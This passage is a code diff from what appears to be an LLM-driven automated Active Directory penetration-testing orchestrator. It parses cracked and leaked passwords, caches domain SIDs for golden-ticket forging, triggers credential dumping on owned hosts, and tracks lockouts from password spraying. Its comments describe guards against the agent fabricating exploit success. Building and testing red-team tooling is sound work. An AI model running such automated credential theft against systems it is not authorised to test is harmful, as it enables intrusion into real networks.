assert_eq!(creds[0].source, "cracked:john"); } @@ -508,7 +556,7 @@ fn extract_cracked_tgs_john_show_unknown_user() { fn extract_cracked_tgs_john_unknown_user_no_hash_context() { // Without a TGS hash line in the output, ?:password is skipped let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let creds = extract_cracked_passwords(output, "contoso.local"); assert!(creds.is_empty(), "No TGS hash context = no credential"); @@ -526,6 +574,51 @@ fn extract_cracked_no_false_positive_on_raw_asrep_hash() { ); } +/// rpcclient queryuser output puts User Name and Description on separate lines. +/// The block-aware parser should extract the password from the Description field. +#[test] +fn extract_rpcclient_queryuser_description_password() { + let output = "\ +\tUser Name :\tjdoe\n\ +\tFull Name :\t\n\ +\tHome Drive :\t\n\ +\tDir Drive :\t\n\ +\tProfile Path:\t\n\ +\tLogon Script:\t\n\ +\tDescription :\tJohn Doe (Password : Summer2024!)\n\ +\tWorkstations:\t\n\ +\tComment :\t\n\ +\tRemote Dial :\n"; + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + assert_eq!( + creds.len(), + 1, + "Should extract credential from rpcclient queryuser block" + ); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].password, "Summer2024!"); + assert_eq!(creds[0].domain, "child.contoso.local"); + assert_eq!(creds[0].source, "description_field"); +} + +/// Multiple rpcclient queryuser blocks — only users WITH passwords should produce creds. +#[test] +fn extract_rpcclient_queryuser_multiple_users() { + let output = "\ +\tUser Name :\tasmith\n\ +\tDescription :\tAlice Smith\n\ +\n\ +\tUser Name :\tjdoe\n\ +\tDescription :\tJohn Doe (Password : Summer2024!)\n\ +\n\ +\tUser Name :\tbjones\n\ +\tDescription :\tBob Jones\n"; + let creds = extract_plaintext_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1, "Only jdoe has a password in description"); + assert_eq!(creds[0].username, "jdoe"); + assert_eq!(creds[0].password, "Summer2024!"); +} + #[test] fn valid_credential_rejects_hash_body_password() { // Long hex+$ strings should be rejected as hash fragments diff --git a/ares-cli/src/orchestrator/output_extraction/users.rs b/ares-cli/src/orchestrator/output_extraction/users.rs index a1dec373..5c3d543a 100644 --- a/ares-cli/src/orchestrator/output_extraction/users.rs +++ b/ares-cli/src/orchestrator/output_extraction/users.rs @@ -26,6 +26,21 @@ static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() }); +/// Check if a domain string looks like a machine hostname rather than an AD domain. +/// +/// Machine FQDNs like `win-g7fpa5zzxzv.w5an.local` or NetBIOS machine names like +/// `WIN-G7FPA5ZZXZV` pollute domain tracking when they appear in SMB banners or +/// UPN suffixes (e.g., null session enum on a DC reports the Kali box's own domain). +pub fn is_machine_hostname_domain(domain: &str) -> bool { + let first_label = domain.split('.').next().unwrap_or(domain); + let lower = first_label.to_lowercase(); + // Windows auto-generated hostnames: WIN-XXXXXXXX, DESKTOP-XXXXXXX + if lower.starts_with("win-") || lower.starts_with("desktop-") { + return true; + } + false +} + /// Reject garbage usernames and invalid domains from regex extraction. pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { if username.is_empty() || username.ends_with('$') { @@ -83,12 +98,17 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { let stripped = line.trim(); if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { - current_domain = caps + let captured = caps .get(1) .unwrap() .as_str() .trim_end_matches('.') .to_string(); + // Don't let machine hostnames (e.g. from Kali's own SMB banner) + // override the task's default domain. + if !is_machine_hostname_domain(&captured) { + current_domain = captured; + } } let mut found = Vec::new(); @@ -102,7 +122,13 @@ pub fn extract_users(output: &str, default_domain: &str) -> Vec { if let Some(caps) = RE_UPN.captures(stripped) { let user = caps.get(1).unwrap().as_str(); let dom = caps.get(2).unwrap().as_str(); - found.push((user.to_string(), dom.to_string())); + // If UPN suffix is a machine hostname (e.g. user@win-xxx.w5an.local), + // substitute the default domain to avoid storing garbage domains. + if is_machine_hostname_domain(dom) { + found.push((user.to_string(), default_domain.to_string())); + } else { + found.push((user.to_string(), dom.to_string())); + } } for caps in RE_USER_BRACKET.captures_iter(stripped) { @@ -216,4 +242,67 @@ mod tests { fn extract_users_empty_output() { assert!(extract_users("", "contoso.local").is_empty()); } + + // --- is_machine_hostname_domain --- + + #[test] + fn machine_hostname_win_prefix() { + assert!(is_machine_hostname_domain("WIN-G7FPA5ZZXZV")); + assert!(is_machine_hostname_domain("win-abc123")); + } + + #[test] + fn machine_hostname_win_fqdn() { + assert!(is_machine_hostname_domain("win-g7fpa5zzxzv.w5an.local")); + assert!(is_machine_hostname_domain("WIN-ABC123.contoso.local")); + } + + #[test] + fn machine_hostname_desktop_prefix() { + assert!(is_machine_hostname_domain("DESKTOP-ABC1234")); + assert!(is_machine_hostname_domain("desktop-xyz.corp.local")); + } + + #[test] + fn real_domain_not_machine_hostname() { + assert!(!is_machine_hostname_domain("contoso.local")); + assert!(!is_machine_hostname_domain("child.contoso.local")); + assert!(!is_machine_hostname_domain("CONTOSO")); + assert!(!is_machine_hostname_domain("CHILD")); + } + + // --- extract_users with machine hostname filtering --- + + #[test] + fn extract_users_smb_banner_machine_domain_ignored() { + // SMB banner with Kali machine domain should not override default_domain + let output = concat!( + "SMB 192.168.58.10 445 DC01 (domain:WIN-G7FPA5ZZXZV) ...\n", + "user:[jdoe] rid:[0x44e]\n", + ); + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + // Should use default_domain, not the machine hostname + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_upn_machine_domain_substituted() { + // UPN with machine FQDN should substitute default_domain + let output = "jdoe@win-g7fpa5zzxzv.w5an.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].username, "jdoe"); + assert_eq!(users[0].domain, "contoso.local"); + } + + #[test] + fn extract_users_real_upn_preserved() { + // Real UPN should keep its domain + let output = "jdoe@contoso.local\n"; + let users = extract_users(output, "contoso.local"); + assert_eq!(users.len(), 1); + assert_eq!(users[0].domain, "contoso.local"); + } } diff --git a/ares-cli/src/orchestrator/result_processing/admin_checks.rs b/ares-cli/src/orchestrator/result_processing/admin_checks.rs index aae0e95b..8e88b993 100644 --- a/ares-cli/src/orchestrator/result_processing/admin_checks.rs +++ b/ares-cli/src/orchestrator/result_processing/admin_checks.rs @@ -7,7 +7,77 @@ use serde_json::Value; use tracing::{info, warn}; use super::parsing::has_domain_admin_indicator; +use super::timeline::{create_admin_upgrade_timeline_event, create_domain_admin_timeline_event}; use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::StateInner; + +/// Resolve a NetBIOS/flat domain name (e.g. `FABRIKAM`) to a known FQDN. +/// +/// Checks three sources, in order: +/// 1. `state.trusted_domains`: each `TrustInfo` carries an explicit `flat_name`. +/// 2. `state.netbios_to_fqdn`: published mappings from host short names; useful +/// when the flat name happens to match a hostname mapping. +/// 3. `state.domains`: derive each FQDN's first label and compare. Catches the +/// primary domain (which is rarely in `trusted_domains`). +/// +/// Returns `None` when the flat name does not correspond to any known domain. +/// Callers must treat that as "skip caching" — guessing risks attributing the +/// SID to the wrong domain. +fn resolve_flat_to_fqdn(flat: &str, state: &StateInner) -> Option { + let target = flat.to_uppercase(); + + if let Some(t) = state + .trusted_domains + .values() + .find(|t| !t.flat_name.is_empty() && t.flat_name.to_uppercase() == target) + { + return Some(t.domain.to_lowercase()); + } + + if let Some(fqdn) = state + .netbios_to_fqdn + .get(&target) + .or_else(|| state.netbios_to_fqdn.get(flat)) + { + // Only accept the mapping if it looks like a domain FQDN, not a host + // FQDN (e.g. "DC02" → "dc02.contoso.local" should NOT yield "dc02…"). + let lower = fqdn.to_lowercase(); + if is_valid_domain_fqdn(&lower) && state.domains.iter().any(|d| d.to_lowercase() == lower) { + return Some(lower); + } + } + + state + .domains + .iter() + .find(|d| { + d.split('.') + .next() + .map(|first| first.eq_ignore_ascii_case(flat)) + .unwrap_or(false) + }) + .map(|d| d.to_lowercase()) +} + +/// Validate that a string looks like a domain FQDN. +/// +/// Rejects empty strings, IP-like patterns, strings with whitespace, and strings +/// without at least one dot. Used to filter out malformed domain values that +/// occasionally appear in tool payloads (e.g. `"192.168.58.30 - dc01"`). +fn is_valid_domain_fqdn(s: &str) -> bool { + if s.is_empty() || s.contains(' ') || s.contains(':') || s.contains('/') { + return false; + } + if !s.contains('.') { + return false; + } + let first_label = s.split('.').next().unwrap_or(""); + if first_label.is_empty() || first_label.chars().all(|c| c.is_ascii_digit()) { + return false; + } + s.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') +} /// Determine the domain admin path from a payload. /// @@ -80,6 +150,12 @@ pub(crate) async fn check_domain_admin_indicators(payload: &Value, dispatcher: & info!("Domain Admin achieved!"); } if !already_da { + // Emit Domain Admin timeline event + let da_domain = { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() + }; + create_domain_admin_timeline_event(dispatcher, &da_domain, path.as_deref()).await; let (domain, dc_target) = { let state = dispatcher.state.read().await; let domain = state.domains.first().cloned().unwrap_or_default(); @@ -172,9 +248,35 @@ pub(crate) async fn check_golden_ticket_completion( if let Some(d) = payload.get("domain").and_then(|v| v.as_str()) { domain = d.to_string(); } - if domain.is_empty() { + // Require a krbtgt hash to actually exist for the chosen domain before + // marking GT — `Saving ticket in *.ccache` also appears in inter-realm + // forge output where no target krbtgt was ever obtained, so without this + // gate we'd publish a false-positive GT for the source/first domain. + { let state = dispatcher.state.read().await; - domain = state.domains.first().cloned().unwrap_or_default(); + let has_krbtgt = |d: &str| -> bool { + let lower = d.to_lowercase(); + state.hashes.iter().any(|h| { + h.username.eq_ignore_ascii_case("krbtgt") && h.domain.to_lowercase() == lower + }) + }; + if domain.is_empty() { + domain = state + .domains + .iter() + .find(|d| has_krbtgt(d)) + .cloned() + .unwrap_or_default(); + } else if !has_krbtgt(&domain) { + warn!( + domain = %domain, + "Suppressing golden_ticket marker — no krbtgt hash present for domain (likely inter-realm forge output)" + ); + return; + } + } + if domain.is_empty() { + return; } if let Err(e) = dispatcher .state @@ -183,6 +285,21 @@ pub(crate) async fn check_golden_ticket_completion( { warn!(err = %e, "Failed to set golden ticket flag"); } + + // Emit attack path timeline event for golden ticket + let techniques = vec!["T1558.001".to_string()]; + let event_id = format!("evt-gt-{}", &uuid::Uuid::new_v4().simple().to_string()[..8]); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "golden_ticket", + "description": format!("Golden ticket forged for domain {domain}"), + "mitre_techniques": techniques, + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &techniques) + .await; } pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: &Arc) { @@ -214,6 +331,17 @@ pub(crate) async fn detect_and_upgrade_admin_credentials(text: &str, dispatcher: pwned_host = ?pwned_ip, "Credential upgraded to admin -- dispatching priority secretsdump" ); + // Mark the host as owned so automations (lsassy_dump, etc.) can fire + if let Some(ref ip) = pwned_ip { + if let Err(e) = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await + { + warn!(err = %e, ip = %ip, "Failed to mark host as owned"); + } + } + create_admin_upgrade_timeline_event(dispatcher, &username, &domain).await; let work: Vec<(String, ares_core::models::Credential)> = { let state = dispatcher.state.read().await; let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); @@ -280,72 +408,124 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A return; } let combined = text_parts.join("\n"); - if let Some(sid) = ares_core::parsing::extract_domain_sid(&combined) { - let domain = payload - .get("domain") - .and_then(|v| v.as_str()) - .map(|d| d.to_lowercase()) - .filter(|d| !d.is_empty()); - let domain = match domain { - Some(d) => d, - None => { - let state = dispatcher.state.read().await; - match state.domains.first() { - Some(d) => d.to_lowercase(), - None => return, - } - } - }; - let already_cached = { + + // Only cache when the output is genuine LSARPC SID-discovery output — i.e. + // it has either the impacket-lookupsid `[*] Domain SID is: …` header or + // the rpcclient `lsaquery` `Domain Name / Domain Sid` pair. Arbitrary recon + // output (LDAP group enumeration, BloodHound dumps, etc.) routinely contains + // foreign-security-principal SIDs that *look* like domain SIDs but are + // actually `-` entries from a different forest. Caching a + // regex-truncated FSP SID against the task's payload domain misforges + // every downstream golden / inter-realm ticket — caused op-20260429-164553 + // to forge a TGT for contoso.local with a bogus ExtraSid that the + // parent KDC rejected with rpc_s_access_denied. + // + // lsaquery is the primary unauth path for cross-forest target SID discovery + // — it routinely succeeds against null sessions where impacket-lookupsid + // gets STATUS_ACCESS_DENIED. op-20260429-181500 discovered fabrikam's SID via + // lsaquery but failed to cache it (only lookupsid was wired up), so the + // subsequent forge_inter_realm_and_dump fired with has_target_sid=false + // and produced no krbtgt extraction. + let lookupsid_sid = ares_core::parsing::LOOKUPSID_HEADER_RE + .captures(&combined) + .and_then(|c| c.get(1).map(|m| m.as_str().to_string())); + let lsaquery_pair = ares_core::parsing::extract_lsaquery_domain_sid(&combined); + let (sid, lsaquery_flat) = match (lookupsid_sid, lsaquery_pair) { + (Some(s), _) => (s, None), + (None, Some((flat, s))) => (s, Some(flat)), + (None, None) => return, + }; + + // Resolve the FQDN this SID belongs to. Anchor preference order: + // 1. Flat name parsed from the output — authoritative when present. For + // impacket-lookupsid we get it from the RID lines (e.g. `500: FABRIKAM\…`); + // for rpcclient lsaquery we get it from `Domain Name: FABRIKAM`. + // 2. Payload's `domain` field — used only when output has no flat name AND + // the field is a valid FQDN. The payload's domain is the *task* target, + // not necessarily the domain that produced the SID; trusting it blindly + // misattributed fabrikam.local's SID to child.contoso.local in + // op-20260429-112418. + // 3. State's primary domain — last resort, only when nothing else applies. + let parsed_flat = lsaquery_flat.or_else(|| { + ares_core::parsing::extract_domain_sid_and_flat_name(&combined).map(|(flat, _)| flat) + }); + let domain = { + let state = dispatcher.state.read().await; + if let Some(flat) = parsed_flat.as_deref() { + resolve_flat_to_fqdn(flat, &state).or_else(|| { + // Flat name parsed but unmapped — refuse to cache. Caching + // against the payload's domain here is exactly the bug we + // are trying to avoid. + warn!( + flat_name = %flat, + sid = %sid, + "Skipping SID cache: flat name does not match any known domain" + ); + None + }) + } else { + // No flat name in output. Fall back to payload domain or primary. + payload + .get("domain") + .and_then(|v| v.as_str()) + .map(|d| d.to_lowercase()) + .filter(|d| is_valid_domain_fqdn(d)) + .or_else(|| state.domains.first().map(|d| d.to_lowercase())) + } + }; + let domain = match domain { + Some(d) => d, + None => return, + }; + let already_cached = { + let state = dispatcher.state.read().await; + state + .domain_sids + .get(&domain) + .map(|s| s == &sid) + .unwrap_or(false) + }; + if !already_cached { + let op_id = { let state = dispatcher.state.read().await; - state + state.operation_id.clone() + }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { + warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + } else { + info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + dispatcher + .state + .write() + .await .domain_sids - .get(&domain) - .map(|s| s == &sid) - .unwrap_or(false) + .insert(domain.clone(), sid.clone()); + } + } + if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { + let already_known = { + let state = dispatcher.state.read().await; + state.admin_names.contains_key(&domain) }; - if !already_cached { + if !already_known { let op_id = { let state = dispatcher.state.read().await; state.operation_id.clone() }; let reader = ares_core::state::RedisStateReader::new(op_id); let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_domain_sid(&mut conn, &domain, &sid).await { - warn!(err = %e, domain = %domain, "Failed to persist domain SID to Redis"); + if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { + warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); } else { - info!(domain = %domain, sid = %sid, "Domain SID cached from task output"); + info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); dispatcher .state .write() .await - .domain_sids - .insert(domain.clone(), sid); - } - } - if let Some(admin_name) = ares_core::parsing::extract_rid500_name(&combined) { - let already_known = { - let state = dispatcher.state.read().await; - state.admin_names.contains_key(&domain) - }; - if !already_known { - let op_id = { - let state = dispatcher.state.read().await; - state.operation_id.clone() - }; - let reader = ares_core::state::RedisStateReader::new(op_id); - let mut conn = dispatcher.queue.connection(); - if let Err(e) = reader.set_admin_name(&mut conn, &domain, &admin_name).await { - warn!(err = %e, domain = %domain, "Failed to persist admin name to Redis"); - } else { - info!(domain = %domain, name = %admin_name, "RID-500 account name cached from task output"); - dispatcher - .state - .write() - .await - .admin_names - .insert(domain, admin_name); - } + .admin_names + .insert(domain, admin_name); } } } @@ -354,8 +534,81 @@ pub(crate) async fn extract_and_cache_domain_sid(payload: &Value, dispatcher: &A #[cfg(test)] mod tests { use super::*; + use ares_core::models::TrustInfo; use serde_json::json; + fn make_trust(domain: &str, flat: &str) -> TrustInfo { + TrustInfo { + domain: domain.to_string(), + flat_name: flat.to_string(), + direction: "bidirectional".to_string(), + trust_type: "forest".to_string(), + sid_filtering: true, + } + } + + // -- resolve_flat_to_fqdn ----------------------------------------------- + + #[test] + fn resolve_flat_uses_trusted_domain_metadata() { + let mut state = StateInner::new("op-test".into()); + state.trusted_domains.insert( + "fabrikam.local".into(), + make_trust("fabrikam.local", "FABRIKAM"), + ); + assert_eq!( + resolve_flat_to_fqdn("FABRIKAM", &state).as_deref(), + Some("fabrikam.local") + ); + } + + #[test] + fn resolve_flat_falls_back_to_primary_domain_label() { + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + Some("contoso.local") + ); + } + + #[test] + fn resolve_flat_unknown_returns_none() { + let state = StateInner::new("op-test".into()); + assert_eq!(resolve_flat_to_fqdn("UNKNOWN", &state), None); + } + + #[test] + fn resolve_flat_does_not_match_host_short_name() { + // netbios_to_fqdn maps DC02 → dc02.contoso.local (a host, not domain). + // resolve_flat_to_fqdn must reject this — dc02.contoso.local is not in + // state.domains, so it cannot be a domain FQDN. + let mut state = StateInner::new("op-test".into()); + state.domains.push("contoso.local".into()); + state + .netbios_to_fqdn + .insert("DC02".into(), "dc02.contoso.local".into()); + assert_eq!(resolve_flat_to_fqdn("DC02", &state), None); + } + + #[test] + fn resolve_flat_prefers_trust_metadata_over_primary_label() { + // Both child.contoso.local and contoso.local are known. + // Flat "CONTOSO" should resolve to the parent FQDN even when + // both could plausibly match by first-label heuristic. + let mut state = StateInner::new("op-test".into()); + state.domains.push("child.contoso.local".into()); + state.domains.push("contoso.local".into()); + state.trusted_domains.insert( + "contoso.local".into(), + make_trust("contoso.local", "CONTOSO"), + ); + assert_eq!( + resolve_flat_to_fqdn("CONTOSO", &state).as_deref(), + Some("contoso.local") + ); + } + // -- resolve_da_path ---------------------------------------------------- #[test] diff --git a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs index 9dd932e6..69c2fbdd 100644 --- a/ares-cli/src/orchestrator/result_processing/discovery_polling.rs +++ b/ares-cli/src/orchestrator/result_processing/discovery_polling.rs @@ -145,7 +145,16 @@ async fn poll_discoveries(dispatcher: &Dispatcher) -> Result<()> { } "user" => { if let Ok(user) = serde_json::from_value::(data.clone()) { - if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { + if [ + "kerberos_enum", + "netexec_user_enum", + "ldap_group_enumeration", + "acl_discovery", + "foreign_group_enumeration", + "ldap_enumeration", + ] + .contains(&user.source.as_str()) + { let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; } } diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs index 730a9815..16bd0feb 100644 --- a/ares-cli/src/orchestrator/result_processing/mod.rs +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -34,7 +34,10 @@ use self::admin_checks::{ }; use self::discovery_polling::has_lockout_in_result; use self::parsing::{parse_discoveries, resolve_parent_id}; -use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; +use self::timeline::{ + create_credential_timeline_event, create_exploitation_timeline_event, + create_hash_timeline_event, create_lateral_movement_timeline_event, +}; /// Kerberos/SMB errors that indicate a credential is locked out. pub(crate) const LOCKOUT_PATTERNS: &[&str] = @@ -50,7 +53,7 @@ pub async fn process_completed_task( let result = &completed.result; // Extract task-level metadata from pending_tasks before complete_task removes it. - let (cred_key, task_domain) = { + let (cred_key, task_domain, task_target_ip) = { let state = dispatcher.state.read().await; let task = state.pending_tasks.get(task_id.as_str()); let ck = task @@ -61,7 +64,11 @@ pub async fn process_completed_task( .and_then(|t| t.params.get("domain")) .and_then(|v| v.as_str()) .map(|s| s.to_string()); - (ck, td) + let tip = task + .and_then(|t| t.params.get("target_ip")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()); + (ck, td, tip) }; { @@ -115,11 +122,37 @@ pub async fn process_completed_task( let default_domain = if let Some(ref td) = task_domain { td.clone() } else { - get_default_domain(dispatcher).await + // Resolve domain from the task's target IP (e.g. secretsdump against a + // specific DC). Falls back to state.domains.first() only as last resort. + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await }; extract_from_raw_text(payload, dispatcher, &default_domain).await; } + // Mark host as owned when a credential_access task succeeds AND parser + // evidence proves credentials/hashes were extracted. The LLM's + // `task_complete(success=true)` is not sufficient on its own — without + // parser-grounded credential evidence we treat the claim as unverified + // and skip the state write. + if result.success { + if let Some(ref ip) = task_target_ip { + if task_id.starts_with("credential_access_") + && result_has_credential_evidence(&result.result) + { + let _ = dispatcher + .state + .mark_host_owned(&dispatcher.queue, ip) + .await; + } else if task_id.starts_with("credential_access_") { + debug!( + task_id = %task_id, + ip = %ip, + "Skipping mark_host_owned: no parser-extracted credential/hash evidence" + ); + } + } + } + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). // Caches the SID for golden ticket generation without needing lookupsid. if let Some(ref payload) = result.result { @@ -140,27 +173,73 @@ pub async fn process_completed_task( } } - if result.success { - if let Some(vuln_id) = completed - .task_id - .starts_with("exploit_") - .then(|| { - result - .result - .as_ref() - .and_then(|r| r.get("vuln_id")) - .and_then(|v| v.as_str()) - .map(|s| s.to_string()) - }) - .flatten() + // Handle exploit task outcomes — create timeline events for both success and failure + if completed.task_id.starts_with("exploit_") { + if let Some(vuln_id) = result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) { - info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); - if let Err(e) = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await - { - warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + // Guard: LLM may call task_complete (success=true) with a result + // that actually describes a failure. Don't mark as exploited if the + // result summary contains clear failure indicators OR if no parser + // evidence (discoveries from real tool stdout) corroborates the + // exploit. The text heuristic catches obvious lies; the parser + // check catches silent fabrication. + let actually_succeeded = result.success + && !result_text_indicates_failure(&result.result) + && result_has_parser_evidence(&result.result); + + if actually_succeeded { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + create_exploitation_timeline_event(dispatcher, &vuln_id, task_id).await; + } else { + // Record failed exploit attempts as timeline events so they appear + // in reports (e.g. noPac patched, PrintNightmare patched, Certifried + // tool missing). This closes the "dispatched but no report evidence" gap. + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + let event_id = format!( + "evt-exploit-fail-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "exploit_failed", + "description": format!("Exploit attempted but failed: {vuln_id} — {err_msg}"), + "mitre_techniques": ["T1210"], + }); + let _ = dispatcher + .state + .persist_timeline_event(&dispatcher.queue, &event, &["T1210".to_string()]) + .await; + info!( + vuln_id = %vuln_id, + task_id = %task_id, + err = err_msg, + "Exploit failure recorded as timeline event" + ); + // Increment per-vuln failure counter; the exploitation workflow + // skips the vuln once it crosses MAX_EXPLOIT_FAILURES, so a + // stuck vuln (e.g. mssql_access with 0 creds) cannot loop + // forever. + let count = dispatcher.state.record_exploit_failure(&vuln_id).await; + if count >= crate::orchestrator::state::MAX_EXPLOIT_FAILURES { + warn!( + vuln_id = %vuln_id, + failure_count = count, + "Vuln abandoned — exceeded max exploit failures" + ); + } } } } @@ -182,15 +261,233 @@ pub async fn process_completed_task( } } + // Per-user lockout quarantine for enumeration paths (no cred_key set). + // username_as_password and password_spray test multiple users in one + // task — when a specific user trips STATUS_ACCOUNT_LOCKED_OUT we + // remember that principal so future enum tasks can skip it. + if has_lockout_in_result(result) { + let locked = extract_locked_usernames_from_result(&result.result); + if !locked.is_empty() { + let resolved_domain = if let Some(ref td) = task_domain { + td.clone() + } else { + resolve_domain_from_ip(dispatcher, task_target_ip.as_deref()).await + }; + if !resolved_domain.is_empty() { + let mut state = dispatcher.state.write().await; + for (user, dom_hint) in &locked { + let dom = dom_hint.as_deref().unwrap_or(&resolved_domain); + warn!( + user = %user, + domain = %dom, + task_id = %task_id, + "User quarantined for 5 min: enumeration lockout detected" + ); + state.quarantine_user(user, dom); + } + } + } + } + dispatcher.credential_access_notify.notify_waiters(); dispatcher.delegation_notify.notify_waiters(); let _ = dispatcher.notify_state_update().await; } -/// Get the default domain from state (first domain, or empty string). -async fn get_default_domain(dispatcher: &Arc) -> String { +/// Extract `(username, optional domain)` pairs from a tool result that +/// reported a per-user lockout. Looks at `tool_outputs`, `output`, +/// `tool_output`, and `summary` fields for netexec-style lines such as: +/// +/// `[-] DOMAIN\\username:password STATUS_ACCOUNT_LOCKED_OUT` +/// `[-] username:password KDC_ERR_CLIENT_REVOKED` +/// +/// Returns lower-cased usernames; the domain (if present in the prefix) is +/// also lowercased. Used by `process_completed_task` to populate +/// `quarantined_users` for enumeration tasks that lack a `cred_key`. +pub(crate) fn extract_locked_usernames_from_result( + result: &Option, +) -> Vec<(String, Option)> { + let mut out: Vec<(String, Option)> = Vec::new(); + let Some(payload) = result else { + return out; + }; + + let mut texts: Vec = Vec::new(); + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + texts.push(s.to_string()); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + texts.push(s.to_string()); + } + } + } + for key in &["summary", "output", "tool_output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + texts.push(s.to_string()); + } + } + + let mut seen: std::collections::HashSet = std::collections::HashSet::new(); + for text in texts { + for line in text.lines() { + if !LOCKOUT_PATTERNS.iter().any(|p| line.contains(p)) { + continue; + } + let Some((user, domain)) = parse_lockout_principal(line) else { + continue; + }; + let user_l = user.to_lowercase(); + // Skip accounts that ship disabled — already filtered at + // dispatch time; quarantining them adds noise, not safety. + if matches!( + user_l.as_str(), + "guest" | "krbtgt" | "defaultaccount" | "wdagutilityaccount" + ) { + continue; + } + let dom_l = domain.map(|d| d.to_lowercase()); + let dedup_key = format!("{user_l}@{}", dom_l.as_deref().unwrap_or("")); + if seen.insert(dedup_key) { + out.push((user_l, dom_l)); + } + } + } + out +} + +/// Pull `(username, Option)` from a netexec line that mentions a +/// lockout. Requires the canonical `DOMAIN\user:pass` token preceding the +/// lockout marker — this is the only form netexec emits for auth events. +/// Bare `user:pass` (or `Welcome1:` style narrative tokens) are rejected +/// because LLM summary text frequently contains `word:` tokens that are +/// not principals (e.g. `Notable:`, `username_as_password:`). +fn parse_lockout_principal(line: &str) -> Option<(String, Option)> { + let marker_pos = LOCKOUT_PATTERNS + .iter() + .filter_map(|p| line.find(p)) + .min()?; + let prefix = &line[..marker_pos]; + let token = prefix + .split_whitespace() + .rev() + .find(|t| t.contains('\\') && t.contains(':'))?; + let principal = token.split(':').next()?; + let (dom, user) = principal.split_once('\\')?; + if user.is_empty() || dom.is_empty() { + return None; + } + Some((user.to_string(), Some(dom.to_string()))) +} + +/// Return true if the task result carries any parser-extracted discoveries. +/// "Parser-extracted" means populated by ares-tools parsers running on real +/// tool stdout — never LLM-fabricated. Used to ground state writes (e.g. +/// `mark_exploited`) against actual evidence. +fn result_has_parser_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + const KEYS: &[&str] = &[ + "credentials", + "hashes", + "hosts", + "shares", + "vulnerabilities", + "delegations", + "trusts", + "users", + "spns", + ]; + KEYS.iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Return true if the task produced parser-extracted credential or hash +/// evidence — the grounding signal for `mark_host_owned` on +/// `credential_access_*` tasks. +fn result_has_credential_evidence(result: &Option) -> bool { + let Some(payload) = result.as_ref() else { + return false; + }; + let Some(disc) = payload.get("discoveries") else { + return false; + }; + ["credentials", "hashes"].iter().any(|k| { + disc.get(*k) + .and_then(|v| v.as_array()) + .map(|a| !a.is_empty()) + .unwrap_or(false) + }) +} + +/// Check whether a task result's text indicates the LLM reported a failure, +/// even though the task technically completed (task_complete was called). +fn 